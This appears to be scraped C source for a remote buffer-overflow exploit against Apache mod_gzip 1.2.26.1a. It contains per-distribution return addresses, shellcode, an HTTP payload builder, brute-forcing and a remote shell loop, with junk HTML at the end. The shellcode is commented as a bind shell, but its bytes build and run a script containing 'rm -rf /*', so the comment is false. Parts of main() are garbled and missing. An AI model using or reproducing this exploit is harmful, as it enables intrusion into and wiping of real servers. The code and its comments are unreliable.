We just add some new rets. w00t!! /* m00-mod_gzip.c * * mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru * * Binds shell on port 63021. * Based on 85mod_gzip.c by xCrZx // crazy_einstein@yahoo.com * * Available targets: * Suse 8.1 * RedHat 7.3 * RedHat 8.0 * RedHat 9.0 * Mandrake 9.1 * * * Testing: * sh-2.05b$ ./m00-mod_gzip localhost 80 * * mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru * * [~] Connecting to localhost:80 * [~] Connected! * [~] Trying to connect to localhost:63021 port!!! * [~] Sleeping... * * [+] Shell spawned! w00t!!! * * uid=99(nobody) gid=99(nobody) groups=99(nobody) * Linux localhost 2.4.21-0.13mdk #1 Fri Nov 22 15:08:06 EST 2003 i686 unknown unknown GNU/Linux * 20:29:44 up 2:29, 3 users, load average: 0.04, 0.09, 0.11 * * * Greets to: * - nerF security team // www.nerf.ru * - LimpidByte // lbyte.sysdrop.org * - priv8security (especially to wsxz =)) // www.priv8security.com * - UHAGr // www.uhagr.com * - ech0 // x25.cc * - ppl from EFnet@m00sec and #nerf * - all our friends from #xakep@DALnet * * Authors: * - Over_G // overg[at]mail.ru * - d4rkgr3y // d4rk[at]securitylab.ru * * Released 22/11/03 // www.m00.ru */ #include #include #include #include #include #include #include #include #include #define STEP 1000 char fmt[] = "POST /?%s HTTP/1.1\r\n" "Content-Type: text/html\r\n" "Host: %s\r\n" "Content-Length: %d\r\n" "Accept-Encoding: gzip, deflate\r\n\r\n" "%s\r\n\r\n"; //shellcode for Linux x86 -> bind shell on 63021 port// char default_shellcode[] = "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50" "\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51" "\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B" "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F" "\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0" "\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01" "\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F" "\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80"; struct TARGETS { char *distr; long ret; long std_err; char *shellcode; char *jmp; } targets[] = { /* you can add targets here */ {"RedHat 9.0", // flavour info 0xbfffc8a2, // ret_addr in stack 0x31823610, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3" }, {"RedHat 8.0", // flavour info 0xbfffd8f0, // ret_addr in stack 0x42127480, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3" }, {"RedHat 7.3", // flavour info 0xbffcf610, // ret_addr in stack 0x42131806, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3" }, {"SuSe 8.1", // flavour info 0xbfc917c0, // ret_add in stack 0x58184617, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3" }, {"Mandrake 9.1", // flavour info 0xbc04172f, // ret_add in stack 0x41196735, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3" } }; long getip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { perror("gethostbyname()"); exit(-1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } void usage(char *prog) { int i=0; printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n",prog); while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr); printf("\n"); exit(0); } int main(int argc, char **argv) { int i=0; struct sockaddr_in sockstruct; struct hostent *HOST; char tmp[20000]; char buf1[5000],buf2[10000]; int sock; fd_set rset; void (*range)(); int port=80,shellport=2003; int step=STEP; char *victim=NULL; long ret=0xbfffffff,ret_err; int brutemode=0; char *shellcode,*jmp; int trg=0; printf("\nmod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru\n\n"); for(i=0;i-1) { if(!brutemode)printf("[~] Connected!\n",i); memset(tmp ,0x00,sizeof tmp ); memset(buf1,0x00,sizeof buf1); memset(buf2,0x00,sizeof buf2); memset(buf1,0x90,2016); memcpy(buf1+strlen(buf1),jmp,strlen(jmp)); memset(buf1+strlen(buf1),0x90,2280); *(long *)&buf1[strlen(buf1)]=ret_err; for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret; memset(buf2,0x90,1000); memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode)); sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2); write(sock,tmp,strlen(tmp)); }else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);} close(sock); ret-= step; if(brutemode) {printf(".");fflush(stdout);} if(!brutemode) { printf("[~] Trying to connect to %s:%d port!!!\n",victim,shellport); printf("[~] Sleeping...\n"); } sleep(2); sock=socket(PF_INET,SOCK_STREAM,0); bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero)); sockstruct.sin_family=PF_INET; sockstruct.sin_addr.s_addr=getip(victim); sockstruct.sin_port=htons(shellport); if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) { printf("\n[+] Shell spawned! w00t!!!\n\n"); write(sock, "id;uname -a\n", 12); while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock + 1, &rset, NULL, NULL, NULL); if (FD_ISSET(sock, &rset)) { i = read(sock, tmp, sizeof(tmp) - 1); if (i <= 0) { printf("[!] Connection closed.\n"); close(sock); exit(0); } tmp[i] = 0; printf("%s", tmp); } if (FD_ISSET(STDIN_FILENO, &rset)) { i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1); if (i > 0) { tmp[i]=0; write(sock, tmp, i); } } } } else if(!brutemode)printf("[x] Shell is inaccessible..\n\n"); close(sock); } while ( brutemode ); return 0; } // m00000000000oooooooooooooooo
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß